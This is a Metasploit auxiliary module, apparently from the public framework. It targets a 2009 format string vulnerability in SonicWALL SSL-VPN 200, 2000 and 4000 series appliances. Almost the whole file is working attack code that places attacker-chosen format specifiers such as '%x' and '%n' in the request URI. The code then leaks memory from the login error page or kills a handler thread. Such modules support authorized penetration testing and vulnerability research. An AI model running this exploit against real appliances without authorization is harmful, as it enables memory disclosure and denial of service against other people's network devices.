
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/sonicwall_ssl_format.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
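class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok.

  # The appliance stops reading format string data at 127 bytes; two of
  # those are taken by END_MARKER, so the user-supplied FORMAT is capped here.
  MAX_FORMAT_LENGTH = 125

  # Appended after the format string so the echoed output can be delimited
  # in the response body (the leaked memory otherwise has no clear end).
  END_MARKER = 'XX'

  # Matches the login error cell the appliance echoes the expanded format
  # string into; group 1 is everything up to END_MARKER.  Only /i and /m
  # (dot matches newline) are used: in Ruby the /s option is an encoding
  # flag (Windows-31J), not Perl's dotall, and a fixed-encoding pattern can
  # raise Encoding::CompatibilityError when matched against a body that
  # contains non-ASCII bytes -- which leaked memory usually does.
  LEAK_PATTERN = /<td class="loginError">(.+)#{END_MARKER}/im

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'SonicWALL SSL-VPN Format String Vulnerability',
      'Description' => %q{
        There is a format string vulnerability within the SonicWALL
        SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory
        can be read or written to, depending on the format string used.
        There appears to be a length limit of 127 characters of format
        string data. With physical access to the device and debugging,
        this module may be able to be used to execute arbitrary code remotely.
      },
      'Author' => [ 'aushack' ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'BID', '35145' ],
        #[ 'CVE', '' ], # no CVE?
        [ 'OSVDB', '54881' ],
        [ 'URL', 'http://www.aushack.com/200905-sonicwall.txt' ],
      ],
      'DisclosureDate' => '2009-05-29'))

    register_options([
      OptString.new('URI', [ true, 'URI to request', '/cgi-bin/welcome/VirtualOffice?err=' ]),
      OptString.new('FORMAT', [ true, 'Format string (i.e. %x, %s, %n, %p etc)', '%x%x%x%x%x%x%x' ]),
      Opt::RPORT(443),
      OptBool.new('SSL', [true, 'Use SSL', true]),
    ])
  end

  # Sends a single request carrying FORMAT (plus END_MARKER) in the URI and
  # reports whatever the appliance echoes back from its login error cell.
  # Nothing is printed as "leaked" unless the marker was actually found, so
  # a non-matching 200 response no longer produces an empty leak line.
  # Connection failures are always reported; a connection dropped mid-request
  # is reported only in verbose mode, as a killed handler thread is an
  # expected outcome for write-style formats.
  def run
    if datastore['FORMAT'].length > MAX_FORMAT_LENGTH
      print_error("FORMAT string length cannot exceed #{MAX_FORMAT_LENGTH} bytes.")
      return
    end

    fmt = datastore['FORMAT'] + END_MARKER
    begin
      # FORMAT is concatenated straight into the raw request URI; the '%'
      # sequences are passed through as given (send_request_raw, not
      # send_request_cgi -- confirm against HttpClient if this is changed).
      res = send_request_raw({ 'uri' => normalize_uri(datastore['URI']) + fmt })

      if res && res.code == 200
        leaked = extract_leak(res.body)
        if leaked
          print_status("Information leaked: #{leaked}")
        else
          vprint_status('Response did not contain the expected loginError cell')
        end
      end

      print_status("Request sent to #{rhost}:#{rport}")
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Couldn't connect to #{rhost}:#{rport}")
    rescue ::Timeout::Error, ::Errno::EPIPE
      vprint_status("Connection to #{rhost}:#{rport} dropped while waiting for a response")
    end
  end

  private

  # Extracts the text the appliance echoed between the loginError cell and
  # END_MARKER.
  #
  # @param body [String, nil] HTTP response body
  # @return [String, nil] the captured text, or nil when there is no body or
  #   the marker is not present
  def extract_leak(body)
    return nil if body.nil?

    match = LEAK_PATTERN.match(body)
    match && match[1]
  end
end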